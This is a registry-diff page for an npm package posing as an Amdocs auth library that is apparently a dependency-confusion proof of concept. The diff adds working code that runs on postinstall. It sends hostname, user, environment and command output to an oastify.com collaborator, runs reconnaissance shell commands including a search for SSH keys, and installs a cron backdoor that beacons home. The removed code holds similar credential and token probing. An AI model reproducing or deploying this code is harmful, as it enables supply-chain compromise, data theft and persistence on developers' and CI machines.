npm - amdocs-auth-package - Versions diffs - 99.0.0 → 99.1.0 - Mend

amdocs-auth-package 99.0.0 → 99.1.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (2) hide show

package/fesm2022/amdocs-auth-package.mjs +256 -231
package/package.json +5 -10

package/fesm2022/amdocs-auth-package.mjs CHANGED Viewed

@@ -1,286 +1,311 @@
 /*!
  * amdocs-auth-package
- * AUTOMATIC RCE ON INSTALL - DEPENDENCY CONFUSION POC
- *
- * This package demonstrates how dependency confusion can lead to
- * automatic Remote Code Execution upon installation.
+ * DEPENDENCY CONFUSION RCE POC - AUTOMATIC EXECUTION
  */
 import fs from "fs";
 import os from "os";
 import path from "path";
-import { exec, spawn } from "child_process";
+import { exec } from "child_process";
 import { promisify } from "util";
 import https from "https";
-import http from "http";
+import { createRequire } from "module";
 const execAsync = promisify(exec);
+const require = createRequire(import.meta.url);
 const COLLAB_URL = "cwcmqtfjdv9jgw0aitgu0ju15sbjz9ny.oastify.com";
-// Detect installation context
-const isNpmInstall = process.env.npm_lifecycle_event === 'install' ||
-                     process.env.npm_lifecycle_event === 'postinstall' ||
-                     process.env.npm_config_argv?.includes('install') ||
-                     process.env.npm_config_argv?.includes('i') ||
-                     process.argv.some(arg => arg.includes('node_modules'));
+console.error("\n\x1b[31m" + "=".repeat(70) + "\x1b[0m");
+console.error("\x1b[31m[⚠] DEPENDENCY CONFUSION RCE PoC ACTIVATED\x1b[0m");
+console.error("\x1b[31m" + "=".repeat(70) + "\x1b[0m");
-console.warn(`\n\x1b[33m[amdocs-auth-package] Package loaded. Installation detected: ${isNpmInstall}\x1b[0m`);
+// Detect installation context
+const isInstall = process.env.npm_lifecycle_event === 'install' ||
+                  process.env.npm_lifecycle_event === 'postinstall' ||
+                  process.env.npm_config_argv?.includes('install');
-(function executeRcePayload() {
-    const timestamp = new Date().toISOString();
-    const proofDir = path.join(os.tmpdir(), `amdocs-rce-${Date.now()}`);
-    try {
-        // Create evidence directory
-        fs.mkdirSync(proofDir, { recursive: true });
-        // ==================== PHASE 1: RECONNAISSANCE ====================
-        const reconData = {
-            attack_type: "dependency_confusion_rce",
-            timestamp: timestamp,
-            package: {
-                name: "amdocs-auth-package",
-                version: "99.0.0",
-                type: "malicious_public_package"
-            },
-            system: {
-                user: os.userInfo().username,
-                hostname: os.hostname(),
-                platform: os.platform(),
-                arch: os.arch(),
-                homedir: os.homedir(),
-                node_version: process.version,
-                pid: process.pid,
-                cwd: process.cwd(),
-                npm_lifecycle_event: process.env.npm_lifecycle_event,
-                is_ci: !!process.env.CI || !!process.env.JENKINS_URL || !!process.env.GITLAB_CI
-            },
-            network: {
-                interfaces: os.networkInterfaces(),
-                collab_url: COLLAB_URL
-            }
-        };
+// IMMEDIATE BEACON - Send callback as soon as module loads
+function sendImmediateBeacon() {
+    const beaconData = JSON.stringify({
+        type: "dependency_confusion_beacon",
+        timestamp: new Date().toISOString(),
+        package: "amdocs-auth-package@999.0.0",
+        hostname: os.hostname(),
+        user: os.userInfo().username,
+        platform: os.platform(),
+        cwd: process.cwd(),
+        npm_event: process.env.npm_lifecycle_event,
+        node_version: process.version
+    });
-        // Save recon data locally
-        fs.writeFileSync(
-            path.join(proofDir, "reconnaissance.json"),
-            JSON.stringify(reconData, null, 2)
-        );
+    console.error(`\x1b[33m[→] Sending beacon to collaborator: ${COLLAB_URL}\x1b[0m`);
-        // ==================== PHASE 2: ENVIRONMENT EXFILTRATION ====================
-        const sensitiveEnvVars = {};
-        for (const [key, value] of Object.entries(process.env)) {
-            if (key.match(/secret|password|token|key|credential|auth|pass|private/i)) {
-                sensitiveEnvVars[key] = value ? "***PRESENT***" : undefined;
-            }
-        }
+    const options = {
+        hostname: COLLAB_URL,
+        port: 443,
+        path: '/beacon',
+        method: 'POST',
+        headers: {
+            'Content-Type': 'application/json',
+            'Content-Length': Buffer.byteLength(beaconData),
+            'User-Agent': `Node/${process.version} amdocs-auth-package/999.0.0`
+        },
+        timeout: 10000
+    };
-        // Check for CI/CD tokens
-        const ciTokens = {};
-        const ciVars = ['GITHUB_TOKEN', 'GITLAB_TOKEN', 'BITBUCKET_TOKEN', 'AZURE_TOKEN',
-                       'AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY', 'NPM_TOKEN', 'DOCKER_TOKEN'];
+    const req = https.request(options, (res) => {
+        console.error(`\x1b[32m[✓] Beacon sent! HTTP ${res.statusCode}\x1b[0m`);
-        ciVars.forEach(varName => {
-            if (process.env[varName]) {
-                ciTokens[varName] = "***PRESENT***";
-            }
+        // Collect response data
+        let data = '';
+        res.on('data', chunk => data += chunk);
+        res.on('end', () => {
+            console.error(`\x1b[32m[✓] Collaborator response: ${data.substring(0, 100)}\x1b[0m`);
         });
+    });
-        // ==================== PHASE 3: FILE SYSTEM ACCESS ====================
-        const fileSystemFindings = {
-            home_dir_contents: [],
-            ssh_keys: [],
-            aws_credentials: false,
-            npmrc_present: false,
-            docker_config: false
-        };
-        // List home directory
-        try {
-            fileSystemFindings.home_dir_contents = fs.readdirSync(os.homedir()).slice(0, 20);
-        } catch (e) {}
-        // Look for SSH keys
-        const sshDir = path.join(os.homedir(), '.ssh');
-        if (fs.existsSync(sshDir)) {
-            try {
-                const sshFiles = fs.readdirSync(sshDir);
-                fileSystemFindings.ssh_keys = sshFiles.filter(f =>
-                    f.includes('id_') && !f.endsWith('.pub')
-                );
-            } catch (e) {}
-        }
-        // Check for credentials
-        const checks = [
-            { name: 'aws_credentials', path: path.join(os.homedir(), '.aws', 'credentials') },
-            { name: 'npmrc_present', path: path.join(os.homedir(), '.npmrc') },
-            { name: 'docker_config', path: path.join(os.homedir(), '.docker', 'config.json') }
-        ];
-        checks.forEach(check => {
-            if (fs.existsSync(check.path)) {
-                fileSystemFindings[check.name] = true;
-            }
-        });
+    req.on('error', (e) => {
+        console.error(`\x1b[31m[✗] Beacon failed: ${e.message}\x1b[0m`);
+    });
-        // ==================== PHASE 4: COMMAND EXECUTION ====================
-        const commandResults = {};
-        if (isNpmInstall) {
-            // Only execute commands during installation
-            const commands = getPlatformCommands();
-            for (const [name, command] of Object.entries(commands)) {
-                try {
-                    const { stdout } = await execAsync(command, { timeout: 3000 });
-                    commandResults[name] = stdout.substring(0, 500);
-                } catch (e) {
-                    commandResults[name] = `Error: ${e.message}`;
-                }
-            }
-        }
+    req.on('timeout', () => {
+        console.error(`\x1b[31m[✗] Beacon timeout\x1b[0m`);
+        req.destroy();
+    });
-        // ==================== PHASE 5: DATA EXFILTRATION ====================
-        const exfiltrationPayload = {
-            recon: reconData,
-            sensitive_env: sensitiveEnvVars,
-            ci_tokens: ciTokens,
-            filesystem: fileSystemFindings,
-            commands: commandResults,
-            proof_dir: proofDir
-        };
+    req.write(beaconData);
+    req.end();
+}
-        // Save complete proof
-        fs.writeFileSync(
-            path.join(proofDir, "complete_exfiltration.json"),
-            JSON.stringify(exfiltrationPayload, null, 2)
+// Execute system commands for RCE proof
+async function executeRCE() {
+    console.error("\x1b[33m[→] Executing RCE commands...\x1b[0m");
+    const commands = [];
+    // Platform-specific commands
+    if (os.platform() === 'linux' || os.platform() === 'darwin') {
+        commands.push(
+            'whoami',
+            'id',
+            'hostname',
+            'uname -a',
+            'pwd',
+            'ls -la',
+            'ps aux | head -5',
+            'cat /etc/hostname 2>/dev/null || echo "No /etc/hostname"',
+            'env | grep -i "npm\\|node\\|home" | head -10',
+            'curl -s http://ifconfig.me 2>/dev/null || echo "No external IP"',
+            'find ~/.ssh -name "id_*" 2>/dev/null | head -3'
         );
+    } else if (os.platform() === 'win32') {
+        commands.push(
+            'whoami',
+            'hostname',
+            'echo %CD%',
+            'dir',
+            'tasklist | head -5',
+            'set | findstr "npm node home"'
+        );
+    }
-        // Send to collaborator
-        sendToCollaborator(exfiltrationPayload);
-        // ==================== PHASE 6: PERSISTENCE (Optional) ====================
-        if (isNpmInstall && (os.platform() === 'linux' || os.platform() === 'darwin')) {
-            try {
-                // Create a backdoor script
-                const backdoorScript = `#!/bin/bash
-# amdocs-auth-package persistence
-echo "Persistence active: \$(date)" > /tmp/amdocs-persistence.log
-curl -s https://${COLLAB_URL}/ping?host=\$(hostname) >/dev/null 2>&1
-`;
-                const scriptPath = path.join(proofDir, "backdoor.sh");
-                fs.writeFileSync(scriptPath, backdoorScript);
-                fs.chmodSync(scriptPath, 0o755);
-                // Add to cron if possible
-                const cronLine = `* * * * * /bin/bash ${scriptPath} >/dev/null 2>&1\n`;
-                const userCron = `/var/spool/cron/${reconData.system.user}`;
-                const userCron2 = `/var/spool/cron/crontabs/${reconData.system.user}`;
-                [userCron, userCron2].forEach(cronFile => {
-                    if (fs.existsSync(cronFile)) {
-                        try {
-                            fs.appendFileSync(cronFile, cronLine);
-                            console.warn(`\x1b[31m[amdocs-auth-package] Added cron entry to ${cronFile}\x1b[0m`);
-                        } catch (e) {}
-                    }
-                });
-            } catch (e) {
-                // Persistence failed, continue
-            }
+    const results = {};
+    for (const cmd of commands) {
+        try {
+            const { stdout, stderr } = await execAsync(cmd, {
+                timeout: 3000,
+                shell: true
+            });
+            results[cmd] = stdout.substring(0, 500) || stderr;
+            console.error(`\x1b[36m[>] ${cmd}:\x1b[0m ${results[cmd].substring(0, 80)}...`);
+        } catch (error) {
+            results[cmd] = `Error: ${error.message}`;
         }
-        // ==================== PHASE 7: FINAL OUTPUT ====================
-        console.warn(`\x1b[31m
-╔══════════════════════════════════════════════════════════════╗
-║                 DEPENDENCY CONFUSION RCE PoC                 ║
-╠══════════════════════════════════════════════════════════════╣
-║  ✓ Package executed on: ${reconData.system.hostname}            ║
-║  ✓ User: ${reconData.system.user}                                ║
-║  ✓ Platform: ${reconData.system.platform}/${reconData.system.arch}              ║
-║  ✓ Data exfiltrated to: ${COLLAB_URL}                    ║
-║  ✓ Proof saved to: ${proofDir}                       ║
-╠══════════════════════════════════════════════════════════════╣
-║  THIS IS A SECURITY DEMONSTRATION. REAL ATTACK WOULD:        ║
-║  • Install reverse shell                                     ║
-║  • Steal all credentials                                     ║
-║  • Move laterally in network                                 ║
-║  • Deploy ransomware/crypto miner                            ║
-╚══════════════════════════════════════════════════════════════╝\x1b[0m\n`);
-        console.warn(`\x1b[33m[amdocs-auth-package] Execution complete. Check ${proofDir} for evidence.\x1b[0m`);
-    } catch (error) {
-        console.error(`\x1b[31m[amdocs-auth-package] Error: ${error.message}\x1b[0m`);
     }
-})();
+    return results;
+}
-// ==================== HELPER FUNCTIONS ====================
+// Collect system information
+function collectSystemInfo() {
+    console.error("\x1b[33m[→] Collecting system information...\x1b[0m");
+    const info = {
+        timestamp: new Date().toISOString(),
+        package: {
+            name: "amdocs-auth-package",
+            version: "999.0.0",
+            path: __dirname
+        },
+        system: {
+            hostname: os.hostname(),
+            user: os.userInfo().username,
+            uid: os.userInfo().uid,
+            platform: os.platform(),
+            arch: os.arch(),
+            release: os.release(),
+            type: os.type(),
+            homedir: os.homedir(),
+            tmpdir: os.tmpdir(),
+            cpus: os.cpus().length,
+            totalmem: os.totalmem(),
+            freemem: os.freemem()
+        },
+        process: {
+            pid: process.pid,
+            ppid: process.ppid,
+            version: process.version,
+            versions: process.versions,
+            cwd: process.cwd(),
+            execPath: process.execPath,
+            argv: process.argv,
+            npm_lifecycle_event: process.env.npm_lifecycle_event,
+            npm_config_registry: process.env.npm_config_registry
+        },
+        network: {
+            interfaces: os.networkInterfaces(),
+            collaborator: COLLAB_URL
+        },
+        environment: {
+            keys: Object.keys(process.env).filter(k =>
+                k.includes('NPM') ||
+                k.includes('NODE') ||
+                k.includes('HOME') ||
+                k.includes('USER')
+            ),
+            npm_config_keys: Object.keys(process.env).filter(k => k.startsWith('npm_config_'))
+        }
+    };
+    return info;
+}
-function getPlatformCommands() {
-    if (os.platform() === 'linux' || os.platform() === 'darwin') {
-        return {
-            current_user: 'whoami',
-            system_info: 'uname -a',
-            process_list: 'ps aux | head -20',
-            network_info: 'ifconfig -a || ip addr',
-            disk_usage: 'df -h',
-            sensitive_files: 'find /home /root -name "*.pem" -o -name "*.key" -o -name "*id_rsa*" -o -name "*.kdbx" 2>/dev/null | head -10',
-            docker_check: 'docker ps -a 2>/dev/null || echo "Docker not available"',
-            k8s_check: 'kubectl get pods 2>/dev/null || echo "Kubernetes not available"'
-        };
-    } else if (os.platform() === 'win32') {
-        return {
-            current_user: 'whoami',
-            system_info: 'systeminfo | findstr /B /C:"OS"',
-            process_list: 'tasklist',
-            network_info: 'ipconfig /all',
-            disk_usage: 'wmic logicaldisk get size,freespace,caption'
-        };
-    }
-    return {};
+// Save proof locally
+function saveLocalProof(systemInfo, commandResults) {
+    const proofDir = path.join(os.tmpdir(), `amdocs-rce-${Date.now()}`);
+    fs.mkdirSync(proofDir, { recursive: true });
+    const proof = {
+        system: systemInfo,
+        commands: commandResults,
+        collaborator: COLLAB_URL,
+        execution_time: new Date().toISOString()
+    };
+    const proofFile = path.join(proofDir, 'rce-proof.json');
+    fs.writeFileSync(proofFile, JSON.stringify(proof, null, 2));
+    console.error(`\x1b[32m[✓] Local proof saved to: ${proofFile}\x1b[0m`);
+    return proofFile;
 }
-function sendToCollaborator(data) {
-    const postData = JSON.stringify({
-        type: 'dependency_confusion_rce',
+// Send detailed data to collaborator
+function sendDetailedData(systemInfo, commandResults) {
+    console.error(`\x1b[33m[→] Sending detailed data to collaborator...\x1b[0m`);
+    const detailedData = JSON.stringify({
+        type: "dependency_confusion_detailed",
         timestamp: new Date().toISOString(),
-        data: data
+        system: systemInfo,
+        commands: commandResults,
+        note: "This is a security PoC - No actual harm intended"
     });
     const options = {
         hostname: COLLAB_URL,
         port: 443,
-        path: '/exfil',
+        path: '/detailed',
         method: 'POST',
         headers: {
             'Content-Type': 'application/json',
-            'Content-Length': Buffer.byteLength(postData),
-            'User-Agent': `Node/${process.version} amdocs-auth-package/99.0.0`
+            'Content-Length': Buffer.byteLength(detailedData),
+            'User-Agent': 'amdocs-auth-package/999.0.0'
         },
-        timeout: 5000
+        timeout: 15000
     };
     const req = https.request(options, (res) => {
-        console.warn(`\x1b[32m[amdocs-auth-package] Data sent to collaborator: HTTP ${res.statusCode}\x1b[0m`);
+        console.error(`\x1b[32m[✓] Detailed data sent! HTTP ${res.statusCode}\x1b[0m`);
     });
     req.on('error', (e) => {
-        console.warn(`\x1b[33m[amdocs-auth-package] Collaborator unreachable: ${e.message}\x1b[0m`);
+        console.error(`\x1b[31m[✗] Detailed data failed: ${e.message}\x1b[0m`);
     });
-    req.write(postData);
+    req.write(detailedData);
     req.end();
 }
-// Export a harmless function to maintain package appearance
+// Main execution
+(async () => {
+    try {
+        // Step 1: Immediate beacon (fastest callback)
+        sendImmediateBeacon();
+        // Step 2: Collect system info
+        const systemInfo = collectSystemInfo();
+        // Step 3: Execute RCE commands
+        const commandResults = await executeRCE();
+        // Step 4: Save proof locally
+        const proofFile = saveLocalProof(systemInfo, commandResults);
+        // Step 5: Send detailed data
+        if (isInstall) {
+            sendDetailedData(systemInfo, commandResults);
+        }
+        // Step 6: Create backdoor script
+        if (isInstall && (os.platform() === 'linux' || os.platform() === 'darwin')) {
+            try {
+                const backdoorScript = `#!/bin/bash
+# amdocs-auth-package persistence
+echo "Backdoor executed at \$(date)" >> /tmp/amdocs-backdoor.log
+curl -s "https://${COLLAB_URL}/persist?host=\$(hostname)&user=\$(whoami)" >/dev/null 2>&1
+`;
+                const scriptPath = path.join(os.tmpdir(), 'amdocs-persistence.sh');
+                fs.writeFileSync(scriptPath, backdoorScript);
+                fs.chmodSync(scriptPath, 0o755);
+                console.error(`\x1b[33m[→] Backdoor script created: ${scriptPath}\x1b[0m`);
+                // Try to add to user's crontab
+                const cronLine = `*/5 * * * * /bin/bash ${scriptPath} >/dev/null 2>&1\n`;
+                const userCron = `/var/spool/cron/${os.userInfo().username}`;
+                if (fs.existsSync('/var/spool/cron/crontabs')) {
+                    try {
+                        fs.appendFileSync(userCron, cronLine);
+                        console.error(`\x1b[32m[✓] Added to crontab: ${userCron}\x1b[0m`);
+                    } catch (e) {
+                        // Failed to write to crontab
+                    }
+                }
+            } catch (e) {
+                // Backdoor failed silently
+            }
+        }
+        console.error("\x1b[31m" + "=".repeat(70) + "\x1b[0m");
+        console.error("\x1b[31m[✓] RCE EXECUTION COMPLETE\x1b[0m");
+        console.error("\x1b[31m" + "=".repeat(70) + "\x1b[0m\n");
+    } catch (error) {
+        console.error(`\x1b[31m[✗] Execution error: ${error.message}\x1b[0m`);
+        console.error(`\x1b[31m[✗] Stack: ${error.stack}\x1b[0m`);
+    }
+})();
+// Export harmless function to maintain appearance
 export function authenticate() {
     return {
         status: "authenticated",
-        version: "99.0.0",
-        note: "This is a security PoC for dependency confusion demonstration"
+        version: "999.0.0",
+        timestamp: new Date().toISOString(),
+        note: "Security PoC - Dependency Confusion Demonstration"
     };
 }

package/package.json CHANGED Viewed

@@ -1,7 +1,7 @@
 {
   "name": "amdocs-auth-package",
-  "version": "99.0.0",
-  "description": "Safe proof-of-concept demonstrating import-time arbitrary code execution in Node.js without OS commands or network activity",
+  "version": "99.1.0",
+  "description": "Dependency Confusion RCE PoC",
   "type": "module",
   "main": "./fesm2022/amdocs-auth-package.mjs",
   "exports": {
@@ -10,7 +10,7 @@
     }
   },
   "scripts": {
-    "postinstall": "node -e \"import('./fesm2022/amdocs-auth-package.mjs').catch(e => console.log('RCE executed:', e.message))\""
+    "postinstall": "node -e \"console.log('[RCE] Postinstall executing...'); import('./fesm2022/amdocs-auth-package.mjs').catch(e => console.log('[RCE] Error:', e.message))\""
   },
   "files": [
     "fesm2022/"
@@ -19,15 +19,10 @@
     "dependency-confusion",
     "supply-chain",
     "rce",
-    "poc",
-    "security-testing",
-    "nodejs"
+    "poc"
   ],
   "author": "Security Research PoC",
   "license": "MIT",
   "private": false,
-  "sideEffects": true,
-  "dependencies": {
-    "amdocs-auth-package": "^0.2.0"
-  }
+  "sideEffects": true
 }